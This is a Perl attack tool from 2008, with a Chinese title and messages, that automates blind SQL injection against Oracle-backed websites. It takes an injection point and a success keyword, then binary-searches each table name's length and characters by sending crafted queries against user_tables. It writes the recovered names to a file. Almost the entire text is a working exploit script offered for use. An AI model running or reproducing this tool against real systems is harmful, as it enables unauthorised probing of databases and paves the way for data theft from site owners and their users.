oracle注入猜表名 with PERL

#!/usr/bin/perl -w

#Codz By N3tl04D
#2008-11-26



use strict;

use LWP;



my $browser;

my $start=time();

my $p;

my $word;

my $pass;



&usage if @ARGV!=4;

my $inject=$ARGV[0];

my $key_word=$ARGV[1];

my $start_table=$ARGV[2];

my $save_path=$ARGV[3];

&info;



sub do_GET {

    $browser = LWP::UserAgent->new unless $browser;

    my $resp = $browser->get(@_);

    return ($resp->content, $resp->status_line, $resp->is_success, $resp)

        if wantarray;

    return unless $resp->is_success;

    return $resp->content;

}



my $crack;

for (my $j=$start_table;$j<=300;$j++) {    

  print "正在测试第$j个表...\n";

  cracklen($j,$word);

  print "得到表长为$crack\n";

  crack($j,$crack);

  $crack=0;

}



sub cracklen {

  my @dic=(32,16,8,4,2,1);

  my $i=0;

  my $op=1;

  foreach my $pass(@dic)

  {

    $i++;

    $crack+=$op*$pass;

    print "大于$crack吗？";

    my $url="$inject%20and%20(select%20%20length(table_name)%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=$_[0]%20order%20by%201%20desc)%20t%20where%20r%3E$_[0]-1%20order%20by%201)t)>".$crack."%20and%20'1'='1";

    print $url;

    my ($content, $status, $is_success) = do_GET($url);

    if (!$is_success) {

      print "网络有问题。等待30秒 $status\n";

      sleep 30;

      last;

    } elsif ($content =~ m/$key_word/)

    {

         $op=1;

         print "        Y\n";

         if($i==@dic)

         {

          $crack++;

         }

    }

    else

    {

      print "        N\n";

         $op=-1;

    }

  }

  return $crack;

}





my $end=time();

my $time=$end-$start;

print "用时".$time."秒\n";



sub crack {

  my $word;

  OUTER:for (my $i=1;$i<=$_[1];$i++) {

  print "正在测试第$i位字母...\n";  

  my $p1=crackasc($i,$_[0]);

  print "得到第$i位为$p1\n";

  $word.=$p1;  

  }

  print $word."\n";

  save($_[0],$word,$_[1]);

}





sub crackasc {

  my @dic=(64,32,16,8,4,2,1);

  my $i=0;

  my $op=1;

  my $crack1;

  foreach my $pass(@dic)

  {

    $i++;

    $crack1+=$op*$pass;

     print "大于$crack1吗？";

    my $url="$inject%20and%20(select%20ascii(substr(table_name,".$_[0].",1))%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=".$_[1]."%20order%20by%201%20desc)%20t%20where%20r%3E".$_[1]."-1%20order%20by%201)t)>".$crack1."%20and%20'1'='1";



    my ($content, $status, $is_success) = do_GET($url);



    if (!$is_success) {

      print "网络有问题。等待30秒 $status\n";

      sleep 30;

      $p=1;

      return $p;

        } elsif ($content =~ m/$key_word/)

    {

         $op=1;

         print "        Y\n";

         if($i==@dic)

         {

          $crack1+=1;                    

          $p=chr($crack1);

          $crack1++;

          return $p;

         }

    }

    else

    {

      print "        N\n";

      $op=-1;

         if($i==7)

         {

          $p=chr($crack1);

          $crack1++;

          return $p;

         }

    }

  }



}







sub save {

    open(FILE1,">>$save_path") || die ("Could not open file");

    print FILE1 "\n第$_[0]个表长$_[2]名$_[1]";

    close(FILE1);

}





sub usage {

        print <<"USAGE";

  ORACLE注入辅助――猜表名

      Codz By N3tl04D  2008-11-26

Syntax: $0 inject_point key_word start_table save_path





USAGE

        exit 0

}





sub info {

        print <<"INFO";

  ORACLE注入辅助――猜表名

      Codz By N3tl04D  2008-11-26

Syntax: $0 inject_point key_word start_table save_path





INFO

#     exit 0

}